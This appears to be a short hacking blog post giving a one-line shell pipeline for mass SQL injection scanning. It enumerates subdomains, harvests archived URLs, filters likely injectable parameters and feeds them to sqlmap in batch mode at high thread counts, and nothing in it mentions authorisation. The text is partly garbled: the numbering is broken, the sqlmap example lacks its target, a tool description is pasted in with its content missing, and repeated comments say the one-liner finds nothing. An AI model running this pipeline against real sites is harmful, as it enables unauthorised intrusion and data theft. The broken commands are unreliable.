Mass Sql Injection scan one line Script

Hello Friends

I hope you all are doing well

Let’s start our new topic which is mass sqlinjection scanning using one line script code. We will use some tools for this so let’s see


  1. Subfinder : – For subdomain Finding

2.  waybackurls : For urls finding

  1. GF : For sqli parameters

  2. sqlmap : For scanning sql injection

<script async src=””></script>

Subfinder :

Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only – passive subdomain enumeration, and it does that very well.


Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for *.domain and output them on stdout.


I use grep a lot. When auditing code bases, looking at the output of meg, or just generally dealing with large amounts of data. I often end up using fairly complex patterns like this one:

Sqlmap :

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.


Sqlmap command : 

sqlmap -u –dbs –random-agent –level=4 –risk=3


Mass sql injection scanning command :

httpx -l domains -silent -threads 1000 | xargs -I@ sh -c ‘findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli –batch –random-agent –level 1’

Youtube: hacktube_official

Twitter: hacktube5

Instagram : monurathor83

This Post Has 3 Comments

  1. Unknown

    But this oneline comment not gets anything from sqlmap

  2. Unknown

    But this oneline comment not gets anything from sqlmap

  3. Unknown

    But this oneline comment not gets anything from sqlmap

Leave a Reply